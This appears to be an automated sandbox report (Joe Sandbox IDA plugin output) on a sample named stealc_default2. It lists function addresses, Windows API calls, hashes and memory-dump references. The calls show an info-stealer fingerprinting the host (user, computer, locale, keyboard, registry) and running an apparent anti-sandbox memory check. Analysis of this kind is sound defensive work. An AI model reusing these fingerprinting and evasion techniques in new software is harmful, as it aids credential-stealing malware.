API String ID: 3287882509-2579291623
Opcode ID: a7056b23c47b345c53d8dacabe632b29dedcfeea3f18bbb7dd8acd3d9089fa3b
Instruction ID: cf0506dbf7c87f70c65e98d1d649f36e902ce8a410d4929f5a9d8e63b5c6742a
Opcode Fuzzy Hash: a7056b23c47b345c53d8dacabe632b29dedcfeea3f18bbb7dd8acd3d9089fa3b
Instruction Fuzzy Hash: D0110030910148BBDB14FFA5DD52EED7778AF50300F404168F95A5B592EF31AB05EA92

Function 00CB0740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,007FD448), ref: 00CB079A
StrCmpCA.SHLWAPI(00000000,007FD598), ref: 00CB0866
StrCmpCA.SHLWAPI(00000000,007FD558), ref: 00CB099D

Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 345909440c611a15306c041196e10218868259712258b778252e0c71d0952c15
Instruction ID: 3b5a88d51576815ab018b224fdf8248d3c51cb22f5fb6cb2763880650e154395
Opcode Fuzzy Hash: 345909440c611a15306c041196e10218868259712258b778252e0c71d0952c15
Instruction Fuzzy Hash: 39917975A10208AFCB28EF64D995BED77B5FF95300F50852CE8499F241DF30AA05DB92

Function 00CB0765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,007FD448), ref: 00CB079A
StrCmpCA.SHLWAPI(00000000,007FD598), ref: 00CB0866
StrCmpCA.SHLWAPI(00000000,007FD558), ref: 00CB099D

Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 5cad5a0aa36241bbcea75a0cabf3ce4aa5fb48f96ca5c7efa5e3a1cb4c9d36d6
Instruction ID: 585c75e50576f65c968990535e49671cf944bbce0f0a564c990ca45c513a7bdc
Opcode Fuzzy Hash: 5cad5a0aa36241bbcea75a0cabf3ce4aa5fb48f96ca5c7efa5e3a1cb4c9d36d6
Instruction Fuzzy Hash: EA817875A10208AFCB28EF64D991BEDB7B5FF94300F50852DE8499F241DB30AA05DB92

Function 00CB78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00CB6A2B), ref: 00CB7910
HeapAlloc.KERNEL32(00000000,?,?,?,00CB6A2B), ref: 00CB7917
GetComputerNameA.KERNEL32(?,00000104), ref: 00CB792F

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 7c3af5c50fd144d61bed44cd373ec382e16ff415fdecbc4b377cd8473d183301
Instruction ID: 3cc703521b1983fda92d6749ec5063e595aefeaf123dbe4e138aacd7f787f2c5
Opcode Fuzzy Hash: 7c3af5c50fd144d61bed44cd373ec382e16ff415fdecbc4b377cd8473d183301
Instruction Fuzzy Hash: 1E0186B1D04248EFCB14DF95DD49BAABBB8F744B11F10426DF945E7280D7745A048BA1

Function 6BAA3060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6BAA3095

Part of subcall function 6BAA35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6BB2F688,00001000), ref: 6BAA35D5
Part of subcall function 6BAA35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6BAA35E0
Part of subcall function 6BAA35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6BAA35FD
Part of subcall function 6BAA35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6BAA363F
Part of subcall function 6BAA35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6BAA369F
Part of subcall function 6BAA35A0: __aulldiv.LIBCMT ref: 6BAA36E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BAA309F

Part of subcall function 6BAC5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6BAC56EE,?,00000001), ref: 6BAC5B85
Part of subcall function 6BAC5B50: EnterCriticalSection.KERNEL32(6BB2F688,?,?,?,6BAC56EE,?,00000001), ref: 6BAC5B90
Part of subcall function 6BAC5B50: LeaveCriticalSection.KERNEL32(6BB2F688,?,?,?,6BAC56EE,?,00000001), ref: 6BAC5BD8
Part of subcall function 6BAC5B50: GetTickCount64.KERNEL32 ref: 6BAC5BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6BAA30BE

Part of subcall function 6BAA30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6BAA3127
Part of subcall function 6BAA30F0: __aulldiv.LIBCMT ref: 6BAA3140

Part of subcall function 6BADAB2A: __onexit.LIBCMT ref: 6BADAB30

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 0569445b56166e4ec775474fe8477c9558bc5e05157e73d12e7e452aabc72f29
Instruction ID: 87d8030703b3aaee29d24f4e54c9e4dace7ba253a1dc3f4fde54fb70622f3f3b
Opcode Fuzzy Hash: 0569445b56166e4ec775474fe8477c9558bc5e05157e73d12e7e452aabc72f29
Instruction Fuzzy Hash: 04F0F932C2078496CF21DF748A426BAB7A0EF6B114F50131BE88563011FB31E5D4C392

Function 00CB7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00CA11B7), ref: 00CB7880
HeapAlloc.KERNEL32(00000000,?,?,?,00CA11B7), ref: 00CB7887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 00CB789F

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: c9fd847d001c8fb8ed099c9661721d5eb62331a06d08e46169188bcfc9b09644
Instruction ID: 0759b7305431c57cc2b3699d01dffbf2feb30131518bfc2eb447542da7c1595e
Opcode Fuzzy Hash: c9fd847d001c8fb8ed099c9661721d5eb62331a06d08e46169188bcfc9b09644
Instruction Fuzzy Hash: B5F04FB1944248AFCB04DF99DD89FAEBBB8EB04711F10026AFA05A2680D77525048BA2

Function 00CB9470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00CB9484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00CB94A5
CloseHandle.KERNEL32(00000000), ref: 00CB94AF

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 8de0cc973890fa0fa4da0e1d026d03a607ce035f7716e233806c23fa335a2c8d
Instruction ID: 462b09e82396c980f89c789575c3e2f08316d3f99b4df42a1ecee1255c494a77
Opcode Fuzzy Hash: 8de0cc973890fa0fa4da0e1d026d03a607ce035f7716e233806c23fa335a2c8d
Instruction Fuzzy Hash: 6FF0307490020CBFDB14DF94DC8AFE97774EB08300F004458BA196B290D6B06A85CB91

Function 00CA1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00CB6A1C), ref: 00CA112B
VirtualAllocExNuma.KERNEL32(00000000,?,?,00CB6A1C), ref: 00CA1132
ExitProcess.KERNEL32 ref: 00CA1143

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: f445ef014d975e221957385963abc295e58fbd5a9909f859127a6e0e550cd412
Instruction ID: 3dda43c98347bbdfc20c740c2642f3ad801bd65e647688867c77ff6bf7badbe8
Opcode Fuzzy Hash: f445ef014d975e221957385963abc295e58fbd5a9909f859127a6e0e550cd412
Instruction Fuzzy Hash: 2FE0867094534CFFE710ABA19C0EB0C7AB8AB04B05F144059F7097A1C0D6B436049699

Function 00CB1A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

Part of subcall function 00CBA9B0: lstrlenA.KERNEL32(?,00CC1110,?,00000000,00CC0AEF), ref: 00CBA9C5
Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
Part of subcall function 00CBA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00CBAA12

Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0AEF), ref: 00CBA905

Part of subcall function 00CB7500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00CB7542
Part of subcall function 00CB7500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CB757F
Part of subcall function 00CB7500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CB7603
Part of subcall function 00CB7500: HeapAlloc.KERNEL32(00000000), ref: 00CB760A

Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
Part of subcall function 00CBA920: lstrcatA.KERNEL32(00000000), ref: 00CBA982

Part of subcall function 00CB7690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CB76A4
Part of subcall function 00CB7690: HeapAlloc.KERNEL32(00000000), ref: 00CB76AB

Part of subcall function 00CB77C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,00CBDBC0,000000FF,?,00CB1C99,00000000,?,00800D98,00000000,?), ref: 00CB77F2
Part of subcall function 00CB77C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,00CBDBC0,000000FF,?,00CB1C99,00000000,?,00800D98,00000000,?), ref: 00CB77F9

Part of subcall function 00CB7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00CA11B7), ref: 00CB7880
Part of subcall function 00CB7850: HeapAlloc.KERNEL32(00000000,?,?,?,00CA11B7), ref: 00CB7887
Part of subcall function 00CB7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00CB789F

Part of subcall function 00CB78E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00CB6A2B), ref: 00CB7910
Part of subcall function 00CB78E0: HeapAlloc.KERNEL32(00000000,?,?,?,00CB6A2B), ref: 00CB7917
Part of subcall function 00CB78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00CB792F

Part of subcall function 00CB7980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00CC0E00,00000000,?), ref: 00CB79B0
Part of subcall function 00CB7980: HeapAlloc.KERNEL32(00000000,?,?,?,?,00CC0E00,00000000,?), ref: 00CB79B7
Part of subcall function 00CB7980: GetLocalTime.KERNEL32(?,?,?,?,?,00CC0E00,00000000,?), ref: 00CB79C4
Part of subcall function 00CB7980: wsprintfA.USER32 ref: 00CB79F3

Part of subcall function 00CB7A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00800268,00000000,?,00CC0E10,00000000,?,00000000,00000000), ref: 00CB7A63
Part of subcall function 00CB7A30: HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00800268,00000000,?,00CC0E10,00000000,?,00000000,00000000,?), ref: 00CB7A6A
Part of subcall function 00CB7A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00800268,00000000,?,00CC0E10,00000000,?,00000000,00000000,?), ref: 00CB7A7D

Part of subcall function 00CB7B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,00800268,00000000,?,00CC0E10,00000000,?,00000000,00000000), ref: 00CB7B35

Part of subcall function 00CB7B90: GetKeyboardLayoutList.USER32(00000000,00000000,00CC05AF), ref: 00CB7BE1
Part of subcall function 00CB7B90: LocalAlloc.KERNEL32(00000040,?), ref: 00CB7BF9
Part of subcall function 00CB7B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 00CB7C0D
Part of subcall function 00CB7B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00CB7C62
Part of subcall function 00CB7B90: LocalFree.KERNEL32(00000000), ref: 00CB7D22

Part of subcall function 00CB7D80: GetSystemPowerStatus.KERNEL32(?), ref: 00CB7DAD

GetCurrentProcessId.KERNEL32(00000000,?,00800E98,00000000,?,00CC0E24,00000000,?,00000000,00000000,?,00800358,00000000,?,00CC0E20,00000000), ref: 00CB207E

Part of subcall function 00CB9470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00CB9484
Part of subcall function 00CB9470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00CB94A5
Part of subcall function 00CB9470: CloseHandle.KERNEL32(00000000), ref: 00CB94AF

Part of subcall function 00CB7E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CB7E37
Part of subcall function 00CB7E00: HeapAlloc.KERNEL32(00000000), ref: 00CB7E3E
Part of subcall function 00CB7E00: RegOpenKeyExA.KERNEL32(80000002,007FB818,00000000,00020119,?), ref: 00CB7E5E
Part of subcall function 00CB7E00: RegQueryValueExA.KERNEL32(?,00800C38,00000000,00000000,000000FF,000000FF), ref: 00CB7E7F
Part of subcall function 00CB7E00: RegCloseKey.ADVAPI32(?), ref: 00CB7E92

Part of subcall function 00CB7F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00CB7FC9
Part of subcall function 00CB7F60: GetLastError.KERNEL32 ref: 00CB7FD8

Part of subcall function 00CB7ED0: GetSystemInfo.KERNEL32(00CC0E2C), ref: 00CB7F00
Part of subcall function 00CB7ED0: wsprintfA.USER32 ref: 00CB7F16

